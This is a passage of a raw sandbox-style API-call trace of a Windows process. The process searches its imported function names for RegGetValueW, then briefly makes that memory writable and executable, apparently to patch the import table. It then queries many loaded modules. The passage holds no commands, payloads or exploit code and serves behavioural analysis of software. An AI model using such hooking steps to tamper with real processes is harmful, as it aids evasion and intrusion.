-1 [0209.034] lstrcmpiA (lpString1="TlsSetValue", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="ResumeThread", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="GetCurrentThreadId", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="TlsFree", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="CreateProcessW", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="GetExitCodeProcess", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="OpenThread", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CreateThread", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="TerminateProcess", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="GetProcessId", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="TlsGetValue", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="OutputDebugStringW", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="OutputDebugStringA", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="GetUserPreferredUILanguages", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="GetThreadUILanguage", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="GetUserGeoID", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="GetUserDefaultLangID", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="FormatMessageW", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="IsValidLocaleName", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="GetLocaleInfoW", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoInitializeSecurity", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="PropVariantClear", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoUninitialize", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="RoGetAgileReference", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="CoSetProxyBlanket", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="IIDFromString", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoCreateInstance", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoCreateGuid", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoGetStdMarshalEx", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CreateStreamOnHGlobal", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoFreeUnusedLibraries", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoInitializeEx", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoGetApartmentType", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="StringFromIID", lpString2="RegGetValueW") returned 1 [0209.035] lstrcmpiA (lpString1="CoCreateFreeThreadedMarshaler", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoDisableCallCancellation", lpString2="RegGetValueW") returned -1 [0209.035] lstrcmpiA (lpString1="CoTaskMemAlloc", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoRevokeClassObject", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoTaskMemRealloc", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoRegisterClassObject", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoWaitForMultipleHandles", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoGetMalloc", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoTaskMemFree", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoMarshalInterThreadInterfaceInStream", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="StringFromGUID2", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="CoReleaseMarshalData", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoCancelCall", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoGetInterfaceAndReleaseStream", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoEnableCallCancellation", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CLSIDFromString", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CoGetCallContext", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="SetUnhandledExceptionFilter", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="SetLastError", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="SetErrorMode", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="GetLastError", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="RaiseException", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="UnhandledExceptionFilter", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="ReleaseSRWLockExclusive", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="AcquireSRWLockExclusive", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="OpenSemaphoreW", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="WaitForSingleObject", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="CreateEventExW", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="InitializeSRWLock", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="SetEvent", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="ReleaseSemaphore", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="Sleep", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="InitOnceBeginInitialize", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="InitOnceComplete", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="OpenEventW", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="InitOnceExecuteOnce", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="WaitForSingleObjectEx", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="LeaveCriticalSection", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="EnterCriticalSection", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="CreateEventW", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="InitializeCriticalSectionEx", lpString2="RegGetValueW") returned -1 [0209.036] lstrcmpiA (lpString1="ReleaseSRWLockShared", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="SleepEx", lpString2="RegGetValueW") returned 1 [0209.036] lstrcmpiA (lpString1="ResetEvent", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="WaitForMultipleObjectsEx", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="OpenMutexW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="ReleaseMutex", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="CreateMutexW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="DeleteCriticalSection", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="AcquireSRWLockShared", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="InitializeCriticalSection", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="CreateThreadpoolWait", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="CreateThreadpoolWork", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="SubmitThreadpoolWork", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="CreateThreadpoolTimer", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="SetThreadpoolWait", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="TrySubmitThreadpoolCallback", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="SetThreadpoolTimer", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="WaitForThreadpoolTimerCallbacks", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="CloseThreadpoolTimer", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="CallbackMayRunLong", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="FreeLibraryWhenCallbackReturns", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="CloseHandle", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="DuplicateHandle", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetSystemTimeAsFileTime", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetOsSafeBootMode", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetSystemTime", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetWindowsDirectoryW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetTickCount64", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetVersionExW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetSystemDirectoryW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetProductInfo", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetTickCount", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="GetLocalTime", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="CreateSemaphoreW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegDeleteValueW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegCreateKeyExW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegEnumValueW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegDeleteTreeW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegEnumKeyExW", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegQueryInfoKeyW", lpString2="RegGetValueW") returned 1 [0209.037] lstrcmpiA (lpString1="RegCloseKey", lpString2="RegGetValueW") returned -1 [0209.037] lstrcmpiA (lpString1="RegGetValueW", lpString2="RegGetValueW") returned 0 [0209.037] VirtualProtect (in: lpAddress=0x7ff62b088938, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f460 | out: lpflOldProtect=0x235f460*=0x2) returned 1 [0209.038] VirtualProtect (in: lpAddress=0x7ff62b088938, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f460 | out: lpflOldProtect=0x235f460*=0x40) returned 1 [0209.038] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977f30000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977f30000, AllocationBase=0x7ff977f30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.038] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.038] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977ab0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977ab0000, AllocationBase=0x7ff977ab0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.038] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.038] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9753d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9753d0000, AllocationBase=0x7ff9753d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.038] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.039] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973090000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973090000, AllocationBase=0x7ff973090000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.039] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.039] lstrcmpiA (lpString1="RtlVirtualUnwind", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlLookupFunctionEntry", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlCaptureContext", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlGUIDFromString", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlInitString", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="NlsMbCodePageTag", lpString2="RegGetValueW") returned -1 [0209.039] lstrcmpiA (lpString1="RtlxAnsiStringToUnicodeSize", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlUpcaseUnicodeString", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlUpcaseUnicodeChar", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="toupper", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="wcschr", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlReAllocateHeap", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="ZwClose", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="sprintf_s", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="strchr", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlInitAnsiString", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="strcpy_s", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlEqualString", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="wcscpy_s", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="wcscat_s", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlDosPathNameToNtPathName_U_WithStatus", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="ZwCreateFile", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="ZwQueryInformationFile", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="ZwUnmapViewOfSection", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="ZwMapViewOfSection", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="ZwCreateSection", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlAppendUnicodeStringToString", lpString2="RegGetValueW") returned 1 [0209.039] lstrcmpiA (lpString1="RtlDoesFileExists_U", lpString2="RegGetValueW") returned 1 [0209.040] lstrcmpiA (lpString1="ZwQueryInformationToken", lpString2="RegGetValueW") returned 1 [0209.040] lstrcmpiA (lpString1="ZwOpenKey", lpString2="RegGetValueW") returned 1 [0209.040] lstrcmpiA (lpString1="ZwQueryValueKey", lpString2="RegGetValueW") returned 1 [0209.040] lstrcmpiA (lpString1="ZwCreateKey", lpString2="RegGetValueW") returned 1 [0209.040] lstrcmpiA (lpString1="RtlGetFullPathName_UEx", lpString2="RegGetValueW") returned 1 [0209.040] lstrcmpiA (lpString1="ZwQueryInformationProcess", lpString2="RegGetValueW") returned 1 [0209.040] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9773c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9773c0000, AllocationBase=0x7ff9773c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.040] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.040] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977760000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977760000, AllocationBase=0x7ff977760000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.040] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.041] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977830000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977830000, AllocationBase=0x7ff977830000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.041] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.041] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977df0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977df0000, AllocationBase=0x7ff977df0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.041] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.042] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9749b0000, AllocationBase=0x7ff9749b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.042] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.042] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9757b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9757b0000, AllocationBase=0x7ff9757b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.042] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.043] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9774c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9774c0000, AllocationBase=0x7ff9774c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.043] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.043] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975310000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff975310000, AllocationBase=0x7ff975310000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.043] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.044] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977360000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977360000, AllocationBase=0x7ff977360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.044] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.044] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975900000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff975900000, AllocationBase=0x7ff975900000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.044] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.045] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974c30000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974c30000, AllocationBase=0x7ff974c30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.045] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.045] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff976f80000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff976f80000, AllocationBase=0x7ff976f80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.045] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.046] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9776c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9776c0000, AllocationBase=0x7ff9776c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.046] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.046] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749a0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9749a0000, AllocationBase=0x7ff9749a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.046] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.046] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974980000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974980000, AllocationBase=0x7ff974980000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.046] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.047] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974a00000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974a00000, AllocationBase=0x7ff974a00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.047] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.047] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974960000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974960000, AllocationBase=0x7ff974960000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.047] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.047] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971180000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971180000, AllocationBase=0x7ff971180000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.047] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.048] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9733b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9733b0000, AllocationBase=0x7ff9733b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.048] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) 